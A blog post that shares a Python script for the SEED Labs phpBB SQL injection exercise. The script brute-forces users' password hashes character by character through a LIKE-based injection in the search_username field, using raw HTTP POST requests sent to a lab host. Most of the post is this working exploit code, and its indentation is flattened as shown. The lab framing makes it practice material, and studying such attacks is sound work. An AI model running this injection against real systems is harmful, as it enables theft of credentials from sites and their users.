SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The below script was developed to demonstrate SQL Injection on the phpBB lab that they provide.  Though the lab itself does not require this it was a great script to write.  With the script I extract the passwords for the 5 users that are found on the system.

This script could be made more efficient with instead brute forcing each letter to making them conditional statements.

#!/usr/bin/env python

import os
import re
from socket import *
from time import ctime

BUFSIZE=1024

# Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'

userNames = ['admin', 'alice', 'bob', 'carol', 'ted'] 
#userNames = ['ted'] 

userPassword = ''
contentLength = 63

for userName in userNames:
for number in range(1,30):
contentLengthTotal = contentLength + number

for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
tcpServerSocket = socket(AF_INET, SOCK_STREAM)
remoteServer = (hostInput, 80)
tcpServerSocket.connect(remoteServer)

searchRequest1 = "POST http://www.sqllabmysqlphpbb.com/search.php?mode=searchuser HTTP/1.1\n"
searchRequest2 = "Host: www.sqllabmysqlphpbb.com\n"
searchRequest3 = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1\n"
searchRequest5 = "Accept-Language: en-US,en;q=0.5\n"
searchRequest6 = "Content-Type: application/x-www-form-urlencoded\n"
searchRequest7 = "Content-Length: " + str(contentLengthTotal) + "\n\n"
searchRequest8 = "search_username=4%27+OR+user_password+LIKE+%27" + userPassword + letter + "%25&search=Search\n\n\n"

searchRequest = searchRequest1 + searchRequest2 + searchRequest3 + searchRequest5 + searchRequest6 + searchRequest7 + searchRequest8

#print searchRequest

tcpServerSocket.send(searchRequest)
f = open('/tmp/output', 'w')
initialLength = 0

while True:
pageReturned = tcpServerSocket.recv(BUFSIZE)
if not pageReturned:
break
#print pageReturned
initialLength = initialLength + 1
f.write(pageReturned)
if initialLength == 14:  
break

f.closed
tcpServerSocket.close()

f = open('/tmp/output', 'r')
userNameInFile = '<option value="' + userName + '">'
for line in f:
if userNameInFile in line:
userPassword = userPassword + letter 
f.closed

print "The hash stored as the password for " + userName + " is " + userPassword
userPassword = ''
contentLength = 63



Comments

Popular posts from this blog

Netflix Streaming Blocked by Sophos UTM

BSides 2016 Hackers Challenge

VBA - Script to Download a file from a URL

IoT Malware Analysis - CnC Server - Part 3

vulnhub - Pandora's Box by c0ne Level 1 - Following walkthrough by strata